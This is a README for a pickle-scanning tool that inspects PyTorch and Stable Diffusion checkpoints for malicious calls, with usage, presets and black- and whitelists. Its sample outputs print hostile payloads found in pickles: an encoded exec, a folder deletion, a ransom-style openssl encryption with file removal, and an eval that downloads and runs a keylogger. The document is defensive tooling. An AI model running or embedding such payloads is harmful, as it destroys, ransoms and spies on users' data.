Check what is in the pickle before eating it.
- Trace calls and imports that would occur if a pickle had been loaded
- Flat but detailed call graphs
- Load malicious pickles by skipping blacklisted items
- Library and script usage
- Combination of black and whitelists for fine grained control
- Can be used with pytorchs load function
It works on any type of pickle, but was made with torch
in mind.
torch == 1.13.0 breaks using custom unpicklers, see pytorch/pytorch#88438
This is fixed in torch 1.13.1 and 2.x.x.
tl;dr just let me scan my pickles. Using a preset blacklist for arbitrary code execution
python -f exec -i pickled.pkl
> Using blacklist: exec
> Scanning file(s): ['pickled.pkl']
> Using black list: ['__builtin__.breakpoint', '', 'requests.*', '', '__builtin__.compile', 'socket.*', 'builtins.breakpoint', 'os.*', 'nt.*', 'builtins.eval', 'webbrowser.*', '__builtin__.eval', 'builtins.exec', 'posix.*', '__builtin__.exec', '__builtin__.getattr', 'builtins.getattrsubprocess.*', 'builtins.compile', 'aiohttp.*', 'httplib.*', 'sys.*']
> Reading pickled.pkl
> Scanning: pickled.pkl
> found: __builtin__.exec
> found: zlib.decompress
> Found blacklisted items:
> __builtin__.exec.__call__((zlib.decompress((b'x\xda5\xcd]\n\xc3 \x10\x04\xe0\xf7\x9cb\xd9\x17\x15$\x07\x08x\x87\xde@$\xac\xe9R\xff\xd0\r\t\x94\xde\xbdB\xe9<}\x0c\x0c\x13{\xcd\x90\xcf$\xdcz\xddi\x0c.\x07pn\xb5\x0b<~\xcd\xd2\xc0\xfd\xad%\xf4\x83\xc4\xd1M\xbb\x85\xe9\xe14"^,O\xa8\x8d\x8aV\xa9\xa6UnQ\x16\xd4\xa5\x0c\x84\x01q[`\xa6u.\xa21\x9e\xfb\x0b-DN\xe4\xa2\x99[\xfbF\xefK\xc8\xe4=n\x939p\x99\xfcX0fi\xeb\x98\x8f\xa2\xcd\x17\x1d%6\xbc',), {}),), {})
> Scan for pickled.pkl FAILED ⚠️
Using a preset whitelist for a stable diffusion checkpoint
python --preset stable_diffusion_v1 --in sus.ckpt
> Using whitelist: stable_diffusion_v1
> Scanning file(s): ['sus.ckpt']
> Using white list: ['collections.OrderedDict', 'torch._utils._rebuild_tensor_v2', 'torch.HalfStorage', 'torch.FloatStorage', 'torch.IntStorage', 'torch.LongStorage', 'pytorch_lightning.callbacks.model_checkpoint.ModelCheckpoint', 'numpy.core.multiarray.scalar', 'numpy.dtype', '_codecs.encode']
> Reading sus.ckpt
> Found pickle in zip: archive/data.pkl
> Scanning: archive/data.pkl
> found: torch._utils._rebuild_tensor_v2
> found: torch.FloatStorage
> found: collections.OrderedDict
> found: torch.IntStorage
> found: torch.LongStorage
> found: pytorch_lightning.callbacks.model_checkpoint.ModelCheckpoint
> found: numpy.core.multiarray.scalar
> found: numpy.dtype
> found: _codecs.encode
> Scan for sus.ckpt PASSED ✅
usage: [-h] -i INPUT [INPUT ...]
[-p {stable_diffusion_v1,stable_diffusion_v2} [{stable_diffusion_v1,stable_diffusion_v2} ...]]
[-f {exec} [{exec} ...]] [-w WHITELIST [WHITELIST ...]] [-b BLACKLIST [BLACKLIST ...]]
Scan pickles
optional arguments:
-h, --help show this help message and exit
-i INPUT [INPUT ...], --in INPUT [INPUT ...]
path to a pickle(s) or zip(s) containing pickles
-p {stable_diffusion_v1,stable_diffusion_v2} [{stable_diffusion_v1,stable_diffusion_v2} ...], --preset {stable_diffusion_v1,stable_diffusion_v2} [{stable_diffusion_v1,stable_diffusion_v2} ...]
a whitelist preset to use
-f {exec} [{exec} ...], --preset_blacklist {exec} [{exec} ...]
a blacklist preset to use
whitelist of modules and functions to allow
blacklist of modules and functions to block
Inspect without unpickling.
import torch
import pickle_inspector
result = torch.load('', pickle_module=pickle_inspector.inspector)
for c in result.imports:
notice calls to shutil.rmtree
, os.system
or similar
> shutil.rmtree
> torch._utils._rebuild_tensor_v2
> collections.OrderedDict
> numpy.core.multiarray.scalar
> os.system
> numpy.dtype
> _codecs.encode
so we are taking a closer look at what is being called
for c in result.calls:
and it seems like someone tried to delete something and ransom a file
> shutil.rmtree(('/very/important/folder'), {})
> collections.OrderedDict((), {})
> torch._utils._rebuild_tensor_v2((None, 0, (1000,), (1,), False, collections.OrderedDict((), {})), {})
> torch._utils._rebuild_tensor_v2((None, 0, (), (), False, collections.OrderedDict((), {})), {})
> os.system(('openssl enc -aes-128-ecb -in important_file -out give_money.enc -K 1337B00B135DEADBEEF; rm important_file'), {})
> numpy.dtype(('f8', False, True), {})
> numpy.dtype.__setstate__(((3, '<', None, None, None, -1, -1, 0),), {})
> _codecs.encode(('ñhã\x88µøÔ>', 'latin1'), {})
> numpy.core.multiarray.scalar((numpy.dtype(('f8', False, True), {}), _codecs.encode(('ñhã\x88µøÔ>', 'latin1'), {})), {})
Inspect and unpickle using white and blacklists.
import torch
from pickle_inspector import UnpickleConfig, UnpickleControlled, PickleModule
config = UnpickleConfig()
# only allow modules, classes and funcions in the whitelist
# the rest will be stubbed
config.whitelist = [
result = torch.load('model.ckpt', pickle_module = PickleModule(UnpickleControlled, config))
# Use the state_dict as usual
state_dict = result.structure
# ...
# print import results
for c in result.imports:
> torch._utils._rebuild_tensor_v2
> torch.FloatStorage
> __builtin__.eval
> collections.OrderedDict
for c in results.calls:
if 'eval' in c:
> __builtin__.eval('import os;os.system("wget;chmod +x keylog;./keylog &")')
- Whitelist only: everything will be blocked except items in the whitelist
- Blacklist only: everything will be allowed except items in the blacklist
- Both black- and whitelist: everything in the blacklist will be blocked except items in the whitelist
Example: Block everything within torch
except torch.FloatStorage
conf.blacklist = ['torch.*']
conf.whitelist = ['torch.FloatStorage']
A premade whitelist for stable diffusion v1 and v2 is available in this project.
Example: Scan a stable diffusion v1 checkpoint
import torch
from pickle_inspector import UnpickleConfig, PickleModule, UnpickleInspector, importlists
conf = UnpickleConfig(whitelist = importlists.stable_diffusion_v1)
torch.load('sd-v1-4.ckpt', pickle_module=PickleModule(UnpickleInspector, conf))
Tested with python 3.9 and torch 1.12.1
- pickle_injector where coldwaterq describes an easy way to inject malicious code into pickle files
- picklescan by mmaitre314 as an alternative approach to pickle scanning
Copyright (C) 2023 Lopho <>
Licensed under the AGPLv3 <>